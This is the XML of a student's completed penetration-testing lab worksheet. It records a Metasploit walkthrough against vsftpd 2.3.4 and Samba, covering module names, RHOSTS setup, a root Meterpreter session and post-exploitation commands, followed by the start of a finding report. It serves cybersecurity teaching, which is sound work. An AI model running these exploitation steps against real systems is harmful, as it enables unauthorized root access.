        <w:gridCol w:w="4089"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="397"/>
            <w:gridCol w:w="2661"/>
            <w:gridCol w:w="2213"/>
            <w:gridCol w:w="408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4444" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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4444" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Target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4444" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>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4444" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploit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B0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">vsftpd 2.3.4 (FTP backdoor)</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B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">21</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sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit/unix/ftp/vsftpd_234_backdoor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B4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba (SMB)</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B6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">445</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sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit/multi/samba/usermap_script</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">
      <w:pPr>
        <w:spacing w:before="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:lineRule="auto"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">My choice (circle or write A or B):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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BA">
      <w:pPr>
        <w:spacing w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">
      <w:pPr>
        <w:spacing w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2e75b6"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Guided Steps (run these commands in order on Kali):</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160"/>
        <w:gridCol w:w="4800"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="400"/>
            <w:gridCol w:w="416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70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">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70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Command to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70.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="70.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">What happened / output you saw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BF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="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sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">msfconsole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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploit Framework started successfully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C2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:b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sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">search vsftpd   (or search samba)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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Found vsftpd 2.3.4 backdoor exploit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C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:b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sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">use exploit/unix/ftp/vsftpd_234_backdoor   (or the Samba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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Selected the exploit module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C8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">set RHOSTS &lt;TARGET_IP&gt;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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Target IP configured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CB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pP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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploit executed and Meterpreter session opened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CE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>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sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">whoami   (inside the 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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Output showed the </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">root</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">user </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5329238" cy="2563302"/>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29238" cy="256330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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pt1_exploit_result.png</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
      <w:pPr>
        <w:spacing w:before="140" w:lineRule="auto"/>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 exploit succeed? Describe what happened in 2–3 sentences:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:color="aaaaaa" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:before="140" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="20124d"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ans: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Yes, the exploit succeeded. A Meterpreter session was opened, and I gained remote shell access to the target machine. I was able to run Linux commands on the system. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:color="aaaaaa" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:color="aaaaaa" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">
      <w:pPr>
        <w:spacing w:before="100" w:lineRule="auto"/>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 account did the shell give you access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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whoami output)? Why does this matter?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:color="aaaaaa" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="20124d"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ans: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The shell gave access as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user. This matters because the root has full administrative privileges and complete control over the system. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:color="aaaaaa" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:spacing w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">
      <w:pPr>
        <w:spacing w:before="100" w:lineRule="auto"/>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TWO simple commands could you run inside the shell to learn more about the target system? Write them below and explain what each one shows:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:lineRule="auto"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command 1: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   uname -a   </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  — what it shows: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows Linux kernel and operating system information. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF">
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:lineRule="auto"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command 2: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">          id         </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  — what it shows: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows the current user ID uid=0(root), group ID  gid=0(root), and user privileges of the logged-in account.</w:t>
      </w:r>
    </w:p>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spacing w:after="80" w:before="80" w:lineRule="auto"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4843463" cy="1393103"/>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43463" cy="1393103"/>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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="555555"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pt1_post_commands.png</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E3">
      <w:pPr>
        <w:spacing w:before="2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800"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="75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60.0" w:type="dxa"/>
              <w:bottom w:w="80.0" w:type="dxa"/>
              <w:right w:w="120.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E4">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PT Task 2: Write a Short Penetration Test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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[20 marks]</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">
      <w:pPr>
        <w:spacing w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What you need to do:</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t xml:space="preserve">Fill in the finding report card below for the exploit you just performed. This is the kind of report a real penetration tester would write for a client.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8">
      <w:pPr>
        <w:spacing w:before="1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E9">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding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EA">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">vsftpd 2.3.4 Backdoor Remote Command Execution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EB">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>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EC">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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ED">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Service &amp;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EE">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">FTP Service — Port 21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EF">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE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F0">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2011-2523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F1">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">What is the vulnerability?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F2">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The vsftpd 2.3.4 FTP service contains a known backdoor vulnerability. An attacker can exploit this weakness to gain unauthorized remote access and execute commands on the target machine.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F3">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
